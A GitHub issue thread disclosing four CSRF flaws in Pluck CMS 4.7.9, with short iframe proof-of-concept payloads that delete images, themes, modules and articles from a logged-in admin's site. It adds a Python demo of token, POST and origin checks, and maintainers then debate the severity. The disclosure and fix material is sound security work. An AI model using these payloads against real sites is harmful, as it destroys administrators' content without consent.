Four CSRF vulnerabilities in pluck cms 4.7.9 #69

Open
China-Eugene opened this Issue Feb 18, 2019 · 4 comments

China-Eugene commented Feb 18, 2019

One: use the CSRF vulnerability to delete pictures
Vulnerability details:
While the administrator is logged in, opening the web page will automatically delete the specified image.
Vulnerability URL: http://127.0.0.1/pluck/admin.php?action=images
Vulnerability PoC:

<iframe src="http://127.0.0.1/pluck/admin.php?action=deleteimage&var1=test.jpg"></iframe>

Two: use the CSRF vulnerability to delete the theme
Vulnerability details:
While the administrator is logged in, opening the web page will automatically delete the specified theme.
Vulnerability URL: http://127.0.0.1/pluck/admin.php?action=theme
Vulnerability PoC:

<iframe src="http://127.0.0.1/pluck/admin.php?action=theme_delete&var1=oldstyl"></iframe>

Three: use the CSRF vulnerability to delete the module
Vulnerability details:
While the administrator is logged in, opening the web page will automatically delete the specified module.
Vulnerability URL: http://127.0.0.1/pluck/admin.php?action=modules
Vulnerability PoC:

<iframe src="http://127.0.0.1/pluck/admin.php?action=module_delete&var1=albums"></iframe>

Four: use the CSRF vulnerability to delete articles
Vulnerability details:
While the administrator is logged in, opening the web page will automatically delete the specified article.
Vulnerability URL: http://127.0.0.1/pluck/admin.php?action=page
Vulnerability PoC:

<iframe src="http://127.0.0.1/pluck/admin.php?action=deletepage&var1=aaaa"></iframe>

Suggested fixes:
One: Validate user submissions with a Referer check, a token, or a verification code.
Two: It is best to require POST for operations that modify or delete.
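
The suggested fixes above, carried into working code. This is an added example written for this page in Python (Pluck itself is PHP, so this is not the project's code and not its admin.php); the `Request` shape, the in-memory `SESSIONS` store, the `SITE_ORIGIN` value, the attacker owning a separate account, and the handler names are all assumptions. It replays the image-delete PoC from the first item against a handler that only checks the login cookie, then against one that requires POST, rejects a foreign Origin/Referer when one is present, and verifies a session-bound token in constant time.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field

# Assumed origin of the Pluck install (the report's PoCs use http://127.0.0.1/pluck/).
SITE_ORIGIN = "http://127.0.0.1"

# In-memory stand-in for the server-side session store (assumption; Pluck uses PHP sessions).
SESSIONS = {}


@dataclass
class Request:
    """Minimal model of an incoming HTTP request (assumed shape, not Pluck's)."""
    method: str
    params: dict                      # merged query-string / form fields
    cookies: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)


def login_admin() -> str:
    """Create an admin session; returns the session id that the browser stores as a cookie."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"admin": True, "csrf_secret": secrets.token_bytes(32)}
    return sid


def csrf_token(sid: str) -> str:
    """Per-session token: HMAC-SHA256 over the action name, keyed by the session's secret.
    A token minted in one session never validates in another, so an attacker cannot
    pre-fill a working token into an auto-submitting form on their own site."""
    return hmac.new(SESSIONS[sid]["csrf_secret"], b"deleteimage", hashlib.sha256).hexdigest()


def _logged_in_admin(req: Request):
    sess = SESSIONS.get(req.cookies.get("sid"))
    return sess if sess and sess.get("admin") else None


def vulnerable_delete(req: Request, images: set) -> str:
    """The pattern the report describes: any request carrying the admin cookie deletes."""
    if _logged_in_admin(req) is None:
        return "denied: not logged in"
    if req.params.get("action") != "deleteimage":
        return "ignored"
    images.discard(req.params.get("var1"))
    return "deleted"


def same_origin(req: Request) -> bool:
    """Origin/Referer check. Defence in depth only: browsers and proxies may strip
    Referer, so a missing header is not treated as a failure; the token decides."""
    src = req.headers.get("Origin") or req.headers.get("Referer")
    if src is None:
        return True
    return src == SITE_ORIGIN or src.startswith(SITE_ORIGIN + "/")


def hardened_delete(req: Request, images: set) -> str:
    """Same action with the checks the report suggests added."""
    if _logged_in_admin(req) is None:
        return "denied: not logged in"
    if req.params.get("action") != "deleteimage":
        return "ignored"
    if req.method != "POST":           # an <iframe>, <img> or link can only issue GET
        return "denied: state change requires POST"
    if not same_origin(req):           # request announces a foreign origin
        return "denied: cross-site origin"
    expected = csrf_token(req.cookies["sid"])
    if not hmac.compare_digest(expected, req.params.get("csrf_token", "")):
        return "denied: bad csrf token"
    images.discard(req.params.get("var1"))
    return "deleted"


def demo() -> dict:
    """Replay the PoC and some variants; returns {case: (verdict, image_still_present)}."""
    victim = login_admin()
    attacker = login_admin()  # assumption: attacker holds their own account and can mint a token
    out = {}

    def run(name, handler, req):
        images = {"test.jpg"}
        out[name] = (handler(req, images), "test.jpg" in images)

    # The PoC: the victim's browser loads the <iframe src=".../admin.php?action=deleteimage&var1=test.jpg">
    # from the attacker's page and attaches the admin's session cookie automatically.
    poc = Request("GET", {"action": "deleteimage", "var1": "test.jpg"},
                  cookies={"sid": victim}, headers={"Referer": "http://attacker.example/"})
    run("vulnerable_get", vulnerable_delete, poc)
    run("hardened_get", hardened_delete, poc)
    # Auto-submitting cross-site <form method="POST"> carrying the attacker's own token.
    xsite = Request("POST", {"action": "deleteimage", "var1": "test.jpg",
                             "csrf_token": csrf_token(attacker)},
                    cookies={"sid": victim}, headers={"Origin": "http://attacker.example"})
    run("hardened_xsite_post", hardened_delete, xsite)
    # Same, with Origin/Referer stripped: the session-bound token is what still stops it.
    run("hardened_xsite_post_noreferer", hardened_delete,
        Request("POST", xsite.params, cookies={"sid": victim}))
    # The admin's own form submission from the images page goes through.
    legit = Request("POST", {"action": "deleteimage", "var1": "test.jpg",
                             "csrf_token": csrf_token(victim)},
                    cookies={"sid": victim}, headers={"Origin": SITE_ORIGIN})
    run("hardened_legit_post", hardened_delete, legit)
    return out


if __name__ == "__main__":
    for case, (verdict, present) in demo().items():
        print(f"{case:32s} {verdict:38s} image still present: {present}")
```

The order of the checks matters less than the token: the POST requirement alone stops the `<iframe>` PoCs but not a cross-site form, and the Origin/Referer check can be bypassed wherever the header is suppressed, which is why the token is bound to the victim's session rather than being a site-wide constant.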

China-Eugene commented Feb 18, 2019

The fourth is to use the CSRF vulnerability to delete articles

BSteelooper commented Feb 19, 2019

Funny, even GitHub is vulnerable... it opened a new window for me ;)

How would you exploit this?

Admins are instructed to go to domain.tld/login.php to log on to Pluck.
Then after this they randomly go to your constructed website, in which you know which page/image etc. exists, and delete this?

Please explain an attack vector in which the admin is not willingly logged on to the admin page.

BSteelooper commented Feb 19, 2019

Dear Eugene,

Thank you for the thumbs-down emoji. You deleted your comment that I will never understand security; since you don't know me, you cannot state this as fact. I have been a Penetration Tester since 2008 and have successfully penetrated several applications and websites. There are several types of attack vectors. For this you need two: Social Engineering and Phishing.

With a code audit (which is now possible, as you stated that it is open source) you can maybe find exploits. Lots have been found and fixed. We are always open to learning about new exploits and bugs.
Issues which require a login before they can be exploited are very hard to exploit. The attack vector is so small and complicated that the risk is near zero. Since two attack vectors need to be combined, and given the type of end user for this product, I cannot find any reason to believe that a hacker would invest that amount of effort and time into an exploit which can then easily be undone by recovering the item from the trash bin.

If you see another attack vector which can be used at this moment, please let me know and I will certainly fix this for you; until then it is rated LOW and I think it will be a won't-fix.

Waiting for your reply,

Kind regards,
Bas

China-Eugene commented Feb 19, 2019

Hi Bas Steelooper, I sent an email to your steelooper mailbox.
